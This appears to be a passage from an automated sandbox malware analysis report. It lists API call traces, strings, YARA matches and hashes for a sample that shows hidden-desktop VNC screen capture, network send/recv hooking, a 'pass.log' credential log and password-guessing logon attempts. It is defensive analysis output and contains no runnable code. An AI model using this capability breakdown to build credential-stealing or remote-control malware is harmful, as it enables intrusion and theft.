                                                                                                                                                                                                            • SendMessageTimeoutA.USER32(00000000,00000021,00000000,00000001,00000002,00000064,?), ref: 02BBA34C
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000020,00000000,00000001), ref: 02BBA391
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000001), ref: 02BBA3E5
                                                                                                                                                                                                              • Part of subcall function 02BBA100: GetTickCount.KERNEL32 ref: 02BBA18A
                                                                                                                                                                                                              • Part of subcall function 02BBA100: GetClassLongA.USER32(00000000,000000E6), ref: 02BBA1DD
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000112,?,?), ref: 02BBA44E
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,0000007B,00000000,?), ref: 02BBA479
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,0000007B,00000000,00000000), ref: 02BBA4F5
                                                                                                                                                                                                            • GetSystemMenu.USER32(00000000,00000000), ref: 02BBA514
                                                                                                                                                                                                            • GetMenuItemInfoA.USER32(00000000,0000F060,00000000,0000004C), ref: 02BBA538
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBA5A3
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 02BBA5B6
                                                                                                                                                                                                            • PostMessageA.USER32(?,?,00000001,00000000), ref: 02BBA5D9
                                                                                                                                                                                                            • PostMessageA.USER32(?,?,00000002,00000000), ref: 02BBA5FB
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02BBA633
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBA65D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$Window$Post$ProcessThread$AncestorInfoLongMenuSend$ActiveClassCountItemLastPopupSystemTickTimeout
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 590198697-0
                                                                                                                                                                                                            • Opcode ID: 20163c82ee87b3616ec0b07b6ff4c7b2443b711e2914e3ca6afad8d611f0f787
                                                                                                                                                                                                            • Instruction ID: 6356255b7b55eacdcf68ebfb71cbb12f324b9cd700084acb856463e00a31301a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20163c82ee87b3616ec0b07b6ff4c7b2443b711e2914e3ca6afad8d611f0f787
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2B17932F4021426EB329A18D889FFE7758DF81755F0840AAFE48E7182C7E9C861C7A1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00008001,?), ref: 02BBA70E
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02BB9523,00008001,?), ref: 02BBA737
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02BBA73E
                                                                                                                                                                                                            • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02BBA752
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00008001,?), ref: 02BBA7C1
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02BB9523,00008001,?), ref: 02BBA7DA
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBA86B
                                                                                                                                                                                                            • GetParent.USER32(00000000), ref: 02BBA882
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02BBA8C9
                                                                                                                                                                                                            • GetWindowInfo.USER32 ref: 02BBA941
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: GetWindowRect.USER32(?,?), ref: 02BB9FF7
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: IsRectEmpty.USER32(?), ref: 02BBA066
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: GetWindowLongA.USER32(?,000000F0), ref: 02BBA076
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: GetParent.USER32(?), ref: 02BBA08A
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: MapWindowPoints.USER32(00000000,00000000,?,02BBA6F4), ref: 02BBA093
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: SetWindowPos.USER32(?,00000000,?,02BBA6F4,00000000,00008001,0000630C,?,02BBA6F4,00000000,00008001,?), ref: 02BBA0B5
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02BBA8F0
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,0000020A,00000000,00000080), ref: 02BBAADF
                                                                                                                                                                                                              • Part of subcall function 02BB9F50: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,02BBA63F,00000000), ref: 02BB9F5C
                                                                                                                                                                                                              • Part of subcall function 02BB9F50: ReleaseMutex.KERNEL32(00000000,?,02BBA63F,00000000), ref: 02BB9F8D
                                                                                                                                                                                                              • Part of subcall function 02BB9F50: IsWindow.USER32(?), ref: 02BB9F94
                                                                                                                                                                                                              • Part of subcall function 02BB9F50: PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02BB9FAD
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$MessageMutexObjectPostReleaseSingleWait$LongParentRect$EmptyInfoPointsProcessThread
                                                                                                                                                                                                            • String ID: <$@
                                                                                                                                                                                                            • API String ID: 2167780881-1426351568
                                                                                                                                                                                                            • Opcode ID: 827f360a9596392434a4c80c892f2826e7752a235798917f59ee636202af0946
                                                                                                                                                                                                            • Instruction ID: 264b16b27c3b0f672a4dd418a17ff4234c9a7a9cd3552944bd9718c80912ee07
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 827f360a9596392434a4c80c892f2826e7752a235798917f59ee636202af0946
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4C1F430A483416BD7268F19C888BFA7BE4EF85754F08899CFA965B2D1D7F0D444CBA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,76A8DB30), ref: 00401EC6
                                                                                                                                                                                                            • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,76A8DB30), ref: 00401EE2
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00401F28
                                                                                                                                                                                                            • NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401F39
                                                                                                                                                                                                            • NetApiBufferFree.NETAPI32(?), ref: 00401F5A
                                                                                                                                                                                                            • NetApiBufferFree.NETAPI32(?), ref: 00401F65
                                                                                                                                                                                                              • Part of subcall function 004018E0: memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,76E95430,00000000,?), ref: 00401923
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                              • Part of subcall function 004018E0: memset.MSVCRT ref: 00401963
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                              • Part of subcall function 004018E0: memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                              • Part of subcall function 004018E0: memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                              • Part of subcall function 004018E0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00401FCA
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 0040200A
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00402046
                                                                                                                                                                                                            • SwitchToThread.KERNEL32(?,?,00404D80,?,?,?), ref: 0040208F
                                                                                                                                                                                                            • NetApiBufferFree.NETAPI32(?), ref: 004020B5
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
                                                                                                                                                                                                            • String ID: %s1$%s12$%s123
                                                                                                                                                                                                            • API String ID: 1588441251-2882894844
                                                                                                                                                                                                            • Opcode ID: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                            • Instruction ID: f170fe93e02ccaf968bc2c6ae71e56240b4678089189b5983d08b015d4f9d182
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 735184B25143016BD331EB54C984FEB73E8ABD8754F404A2EF6846B1D0DB78DA44CBA6
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCE1D1
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,<L>,?,00000000,?), ref: 02BCE209
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C260), ref: 02BCE23D
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C260), ref: 02BCE273
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(00000000), ref: 02BCE2B9
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCB980,00000000,00000000,00000000), ref: 02BCE338
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCE350
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCE361
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BCE387
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BCE3C4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashHandle$CloseCreateExistsFileInformationThreadmemcpymemsetstrstr
                                                                                                                                                                                                            • String ID: <L>$POST$bsi.dll$pass.log
                                                                                                                                                                                                            • API String ID: 4177962767-2639756587
                                                                                                                                                                                                            • Opcode ID: 59c49b8c7818c5c1bd8e38888d045edbfff2e8b4bdf8f57d6949d855f1eb6b47
                                                                                                                                                                                                            • Instruction ID: 46df604d2f633d9e092139db962f8a8c0f9caf5889cf91ce54daf9e584c0ba98
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59c49b8c7818c5c1bd8e38888d045edbfff2e8b4bdf8f57d6949d855f1eb6b47
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 45512E31D40309DBD7229F34E848BDA7BA5FF88704F2586D9EA4597280DBB0EA54CBD0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetThreadDesktop.USER32(?,76F8F590,76F816B0,?), ref: 02BB902F
                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 02BB9037
                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 02BB9048
                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 02BB9059
                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02BB9070
                                                                                                                                                                                                            • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02BB90B2
                                                                                                                                                                                                            • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02BB90C2
                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 02BB90C5
                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 02BB90CE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BB9129
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02BB9142
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02BB915F
                                                                                                                                                                                                            • SetThreadDesktop.USER32(?), ref: 02BB9194
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocBitsCapsDesktopDeviceThread$BitmapCompatibleCreateDeleteFreeObjectRelease
                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                            • API String ID: 188880187-3887548279
                                                                                                                                                                                                            • Opcode ID: 82e4b6dae060cf417f81fcc2b31a3116b882f478e14696a1fb1a2337f630cee5
                                                                                                                                                                                                            • Instruction ID: 354fc3fd9d13f3d189becb481a452ea0169f03e41d30372ffc7b453bb87baad3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82e4b6dae060cf417f81fcc2b31a3116b882f478e14696a1fb1a2337f630cee5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D414F71E41314AFDB60CFA8D889FEA7BB8EB49750F544569E608EB381D7705810CFA4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02BD31EC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BD31FD
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD3211
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD321F
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD3080,00000000,00000000,00000000), ref: 02BD3234
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40), ref: 02BD3245
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BD324A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD325E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD326C
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CE90), ref: 02BD3277
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0CE90,RFK), ref: 02BD3291
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BD329A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • RFK, xrefs: 02BD327D
                                                                                                                                                                                                            • Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02BD31E0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                            • API String ID: 505831200-3131017963
                                                                                                                                                                                                            • Opcode ID: e47741c809ca2dc70248b2c73a57f488b0dfef15b4816ec6257fcc53d65c51c7
                                                                                                                                                                                                            • Instruction ID: ff859a45a5d056cd9978ac2d0f3cee82835e8d13f95d120a51b98ccdcdc10604
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e47741c809ca2dc70248b2c73a57f488b0dfef15b4816ec6257fcc53d65c51c7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E111E230AC57027BF26067649C0AF9F77D8AF04B94F508684FB95B61C1ABE0A5008FB7
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(advapi32.dll,00000000,00000000,76F8F550,76F8DF10,02BC598B), ref: 02BC9831
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 02BC9843
                                                                                                                                                                                                              • Part of subcall function 02BCA540: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,76F8F550,00000000,753CBD50,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA578
                                                                                                                                                                                                              • Part of subcall function 02BCA540: memcpy.MSVCRT ref: 02BCA5A0
                                                                                                                                                                                                              • Part of subcall function 02BCA540: VirtualProtect.KERNEL32(00000000,?,00000040,02BC98DA,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA635
                                                                                                                                                                                                              • Part of subcall function 02BCA540: VirtualProtect.KERNEL32(?,00000000,00000040,02BC98DA,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA64A
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02BC9862
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,send), ref: 02BC9870
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WSASend), ref: 02BC988C
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WSARecv), ref: 02BC98A8
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,recv), ref: 02BC98C4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$Virtual$LibraryLoadProtect$Allocmemcpy
                                                                                                                                                                                                            • String ID: CryptEncrypt$WSARecv$WSASend$advapi32.dll$recv$send$ws2_32.dll
                                                                                                                                                                                                            • API String ID: 1216545827-2206184491
                                                                                                                                                                                                            • Opcode ID: fb0b1d228f9a03b660fd1cb2c8387043e08823716844a4df9e2989cf28e8c9c0
                                                                                                                                                                                                            • Instruction ID: 706086d7263a89eedce37d64d4fa08687f9015a9991ce9633dbe8181c86b88b7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb0b1d228f9a03b660fd1cb2c8387043e08823716844a4df9e2989cf28e8c9c0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1012972BC5F1A71FA6036760D02F2B134C5B84F88F3505E87603B6095EA98E50945B8
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: malloc$inet_ntoa$closesocketfreegetpeernamesetsockopt
                                                                                                                                                                                                            • String ID: RFB 003.006
                                                                                                                                                                                                            • API String ID: 725816019-3790533501
                                                                                                                                                                                                            • Opcode ID: 363736c2336352898dad00d5f5a9c83b59d97b65f820c5ee2d897fe6c4cbe7ae
                                                                                                                                                                                                            • Instruction ID: 33c5ccd3f80c4411ab2af1f22f274613ebb151a6400bccb3516cbeb060aa573d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 363736c2336352898dad00d5f5a9c83b59d97b65f820c5ee2d897fe6c4cbe7ae
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06C149B0A046448FDB14CF29D484B96BBE5FF88310F1985BADD5A8F356E775A800CFA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                              • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                              • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                              • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                              • Part of subcall function 00401E00: AdjustTokenPrivileges.ADVAPI32(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                              • Part of subcall function 00401E00: CloseHandle.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                            • SetEndOfFile.KERNEL32(00000000), ref: 004010F6
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00401129
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                            • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                            • API String ID: 1027056982-820036962
                                                                                                                                                                                                            • Opcode ID: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                            • Instruction ID: 0b24c45107c0befc32dd0ff84bd5674d64e160e2b6de00103b139920790b26b7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 874152B5600208BBE7209B94DD49FAF7BBDEB89741F144026FB04FA2D0D7B49941C7A8
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02BD31EC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BD31FD
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD3211
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD321F
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD3080,00000000,00000000,00000000), ref: 02BD3234
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40), ref: 02BD3245
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BD324A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD325E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD326C
